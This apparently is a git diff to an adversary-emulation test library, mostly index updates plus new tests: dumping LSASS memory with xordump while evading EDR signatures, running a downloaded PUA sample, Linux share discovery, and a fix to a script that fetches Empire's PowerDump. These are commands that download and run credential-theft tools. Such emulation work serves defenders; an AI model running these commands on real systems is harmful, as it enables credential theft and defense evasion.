diff --git a/Gemfile.lock b/Gemfile.lock
index 96f60456..68078e7a 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -208,14 +208,14 @@ GEM
rb-fsevent (~> 0.10, >= 0.10.3)
rb-inotify (~> 0.9, >= 0.9.10)
mercenary (0.3.6)
- mini_portile2 (2.5.0)
+ mini_portile2 (2.5.1)
minima (2.5.1)
jekyll (>= 3.5, < 5.0)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.14.2)
multipart-post (2.1.1)
- nokogiri (1.11.1)
+ nokogiri (1.11.4)
mini_portile2 (~> 2.5.0)
racc (~> 1.4)
octokit (4.19.0)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8a3b34df..d296f349 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -412,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
@@ -642,10 +643,11 @@ discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7b
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
-discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
-discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
-discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
-discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
+discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
+discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
+discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
+discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
+discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -680,7 +682,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
@@ -732,6 +734,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
+execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 0f865aa6..906a2291 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -136,7 +136,7 @@ discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f
discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
-discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
+discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 2d4561e6..0aab232a 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0d36ac..d9ef501a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -455,10 +456,10 @@ discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Lo
discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
-discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
-discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
-discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
-discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
+discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
+discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
+discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
+discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
@@ -535,6 +536,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
+execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d9a87458..815d45b6 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -450,6 +450,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -1123,11 +1124,12 @@
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- - Atomic Test #1: Network Share Discovery [macos, linux]
- - Atomic Test #2: Network Share Discovery command prompt [windows]
- - Atomic Test #3: Network Share Discovery PowerShell [windows]
- - Atomic Test #4: View available share drives [windows]
- - Atomic Test #5: Share Discovery with PowerView [windows]
+ - Atomic Test #1: Network Share Discovery [macos]
+ - Atomic Test #2: Network Share Discovery - linux [linux]
+ - Atomic Test #3: Network Share Discovery command prompt [windows]
+ - Atomic Test #4: Network Share Discovery PowerShell [windows]
+ - Atomic Test #5: View available share drives [windows]
+ - Atomic Test #6: Share Discovery with PowerView [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
@@ -1327,6 +1329,7 @@
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
+ - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 4df39794..18f9130e 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -408,7 +408,7 @@
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- - Atomic Test #1: Network Share Discovery [macos, linux]
+ - Atomic Test #2: Network Share Discovery - linux [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 35ba3e08..ebfb40df 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -353,7 +353,7 @@
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- - Atomic Test #1: Network Share Discovery [macos, linux]
+ - Atomic Test #1: Network Share Discovery [macos]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d2bd5efb..803162e4 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -50,6 +50,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -828,10 +829,10 @@
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- - Atomic Test #2: Network Share Discovery command prompt [windows]
- - Atomic Test #3: Network Share Discovery PowerShell [windows]
- - Atomic Test #4: View available share drives [windows]
- - Atomic Test #5: Share Discovery with PowerView [windows]
+ - Atomic Test #3: Network Share Discovery command prompt [windows]
+ - Atomic Test #4: Network Share Discovery PowerShell [windows]
+ - Atomic Test #5: View available share drives [windows]
+ - Atomic Test #6: Share Discovery with PowerView [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
@@ -981,6 +982,7 @@
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
+ - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 71ce48ba..107864b9 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20953,6 +20953,43 @@ credential-access:
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: 'del #{output_file}
+'
+ name: powershell
+ elevation_required: true
+ - name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: "The memory of lsass.exe is often dumped for offline credential
+ theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+ exported functions. Xordump will re-read the resulting minidump \nfile and
+ delete it immediately to avoid brittle EDR detections that signature lsass
+ minidump files.\n\nUpon successful execution, you should see the following
+ file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: 'Computer must have xordump.exe
+
+'
+ prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+ -OutFile #{xordump_exe}
+
+'
+ executor:
+ command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+ cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
'
name: powershell
elevation_required: true
@@ -22732,7 +22769,7 @@ credential-access:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
@@ -32908,7 +32945,7 @@ defense-evasion:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
@@ -32941,7 +32978,7 @@ defense-evasion:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
@@ -32957,7 +32994,7 @@ defense-evasion:
"#{cert_filename}"
'
- name: command_prompt
+ name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
@@ -42958,8 +42995,27 @@ defense-evasion:
description: Path of folder to recursively set permissions on
type: path
default: C:\Users\Public\*
+ file_path:
+ description: Path of folder permission back
+ type: Path
+ default: "%temp%\\T1222.001-folder-perms-backup.txt"
+ dependency_executor_name: command_prompt
+ dependencies:
+ - description: 'Backup of original folder permissions should exist (for use
+ in cleanup commands)
+
+'
+ prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+
+'
+ get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
+
+'
executor:
command: icacls "#{path}" /grant Everyone:F /T /C /Q
+ cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
+
+'
name: command_prompt
elevation_required: true
T1220:
@@ -47503,7 +47559,6 @@ discovery:
'
supported_platforms:
- macos
- - linux
input_arguments:
computer_name:
description: Computer name to find a mount on.
@@ -47515,6 +47570,38 @@ discovery:
smbutil view -g //#{computer_name}
showmount #{computer_name}
name: sh
+ - name: Network Share Discovery - linux
+ auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
+ description: 'Network Share Discovery using smbstatus
+
+'
+ supported_platforms:
+ - linux
+ input_arguments:
+ package_checker:
+ description: Package checking command. Debian - dpkg -s samba
+ type: string
+ default: rpm -q samba
+ package_installer:
+ description: Package installer command. Debian - apt install samba
+ type: string
+ default: yum install -y samba
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'Package with smbstatus (samba) must exist on device
+
+'
+ prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
+ 1; fi
+
+'
+ get_prereq_command: "sudo #{package_installer} \n"
+ executor:
+ command: 'smbstatus --shares
+
+'
+ name: bash
+ elevation_require: true
- name: Network Share Discovery command prompt
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
description: |
@@ -48719,7 +48806,7 @@ discovery:
supported_platforms:
- macos
executor:
- name: command_prompt
+ name: sh
elevation_required: false
command: |-
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
@@ -54438,6 +54525,38 @@ execution:
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
+ - name: Potentially Unwanted Applications (PUA)
+ auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
+ description: 'The Potentially Unwanted Applications (PUA) protection feature
+ in antivirus software can identify and block PUAs from downloading and installing
+ on endpoints in your network. These applications are not considered viruses,
+ malware, or other types of threats, but might perform actions on endpoints
+ that adversely affect their performance or use. This file is similar to EICAR
+ test virus file, but is considered a Potentially Unwanted Application (PUA)
+ instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify
+ anti-pua protection).
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ pua_url:
+ description: url to PotentiallyUnwanted.exe
+ type: url
+ default: http://amtso.eicar.org/PotentiallyUnwanted.exe
+ pua_file:
+ description: path to PotentiallyUnwanted.exe
+ type: Path
+ default: "$env:TEMP/PotentiallyUnwanted.exe"
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
+ & "#{pua_file}"
+ cleanup_command: 'Remove-Item #{pua_file}
+
+'
T1204.001:
technique:
created: '2020-03-11T14:43:31.706Z'
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index aad552e0..26822e04 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials:
- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
+
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
+
+
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 2014b6e2..eb902b08 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -138,6 +138,7 @@ atomic_tests:
